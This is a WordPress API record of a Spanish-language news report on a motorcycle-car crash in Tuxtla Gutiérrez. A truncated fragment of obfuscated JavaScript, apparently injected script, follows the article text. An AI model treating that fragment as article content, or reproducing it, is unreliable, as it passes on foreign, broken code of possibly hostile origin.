{"id":13348,"date":"2023-12-21T23:58:04","date_gmt":"2023-12-21T23:58:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13348"},"modified":"2023-12-21T23:58:05","modified_gmt":"2023-12-21T23:58:05","slug":"chocan-moto-y-vehiculo-en-la-zona-oriente-de-tuxtla-gutierrez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13348","title":{"rendered":"Chocan moto y veh\u00edculo en la zona Oriente de Tuxtla Guti\u00e9rrez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1703202991885-1024x576.jpg\" alt=\"\" class=\"wp-image-13349\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1703202991885-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1703202991885-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1703202991885-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1703202991885.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 21 de diciembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la ma\u00f1ana, se registr\u00f3 una colisi\u00f3n entre una motocicleta y un automovil particular, en la zona Oriente de Tuxtla, a la altura de la Central de Abastos.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando Romeo de 43 a\u00f1os de edad conduc\u00eda su motocicleta Honda CB de color rojo y cuando sal\u00eda de la central de abastos fue impactado por un Nissan Sentra de color gris que sal\u00eda del Bulevar Ej\u00e9rcito Mexicano de Poniente a Oriente.Por el golpe el motociclista sali\u00f3 proyectado y se estrell\u00f3 contra el pavimento.Al lugar arribaron param\u00e9dicos de la Cruz Roja Mexicana para atender al lesionado pero no fue trasladado a un nosocomio.Al no llegar a un acuerdo armonioso, las unidades fueron puestas a disposici\u00f3n del Ministerio P\u00fablico para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 21 de diciembre del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la ma\u00f1ana, se registr\u00f3 una colisi\u00f3n entre una motocicleta y un automovil particular, en la zona Oriente de Tuxtla, a la altura de la Central de Abastos.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando Romeo de 43 a\u00f1os de edad &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13349,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-13348","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13348"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13348\/revisions"}],"predecessor-version":[{"id":13350,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13348\/revisions\/13350"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13349"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}